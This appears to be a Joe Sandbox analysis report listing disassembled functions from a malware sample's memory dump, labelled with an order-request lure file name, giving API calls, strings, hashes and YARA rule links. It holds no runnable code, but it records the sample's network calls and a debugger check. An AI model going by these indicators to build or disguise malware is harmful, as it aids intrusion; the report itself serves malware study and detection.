Instruction ID: cde52b3ca8712c625de002da450250744642bb9d8a04c3b997614ed6dba67ccd
Opcode Fuzzy Hash: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
Instruction Fuzzy Hash: 8C41A771A0021ABADF20AAA5CC45FEF77BDDF85714F00047EB604B7181DA79AD058B69

Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0044057F

Strings

DdL, xrefs: 0040A317
DdL, xrefs: 0040A151

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ClearVariant
String ID: DdL$DdL
API String ID: 1473721057-91670653
Opcode ID: c0a4b12d34a2949c4f0399b8a32a882820cb71d7b6b526698ba9514fc12a179e
Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
Opcode Fuzzy Hash: c0a4b12d34a2949c4f0399b8a32a882820cb71d7b6b526698ba9514fc12a179e
Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A

Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4

Strings

|, xrefs: 004725A5

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65

Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00486B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53

Strings

static, xrefs: 00486AB3

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68

Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C

Strings

0, xrefs: 0046290A

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 02f8dc35456dfc2bbe9dcb27fd05540f8121118cc68a5e2dcd1f62f28904bbf4
Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
Opcode Fuzzy Hash: 02f8dc35456dfc2bbe9dcb27fd05540f8121118cc68a5e2dcd1f62f28904bbf4
Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B

Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C

Strings

Combobox, xrefs: 0048672E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8

Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

GetWindowRect.USER32(00000000,?), ref: 00486C71
GetSysColor.USER32(00000012), ref: 00486C8B

Strings

static, xrefs: 00486C4E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64

Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004869A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1

Strings

edit, xrefs: 00486986

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758

Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41

Strings

0, xrefs: 00462A18

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A

Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255

Strings

<local>, xrefs: 0047221D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9

Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

_wcscat.LIBCMT ref: 00444CB7

Strings

SL, xrefs: 004109AE

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: SL
API String ID: 257928180-181245872
Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D

Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73

Strings

ComboBox, xrefs: 00458E12
ListBox, xrefs: 00458E3D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655

Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00468DAC
__fread_nolock.LIBCMT ref: 00468DC1

Strings

EA06, xrefs: 00468DF3

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
Opcode Fuzzy Hash: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764

Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B

Strings

ComboBox, xrefs: 00458D0A
ListBox, xrefs: 00458D35

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A

Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE

Strings

ComboBox, xrefs: 00458D8F
ListBox, xrefs: 00458DBA

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A

Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045C534

Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C

VariantClear.OLEAUT32(?), ref: 0045C556

Strings

d}K, xrefs: 0045C517

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}K
API String ID: 2932060187-3405784397
Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54

Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00464F46
_wcscmp.LIBCMT ref: 00464F58

Strings

#32770, xrefs: 00464F52

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5

Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321

Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945

IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
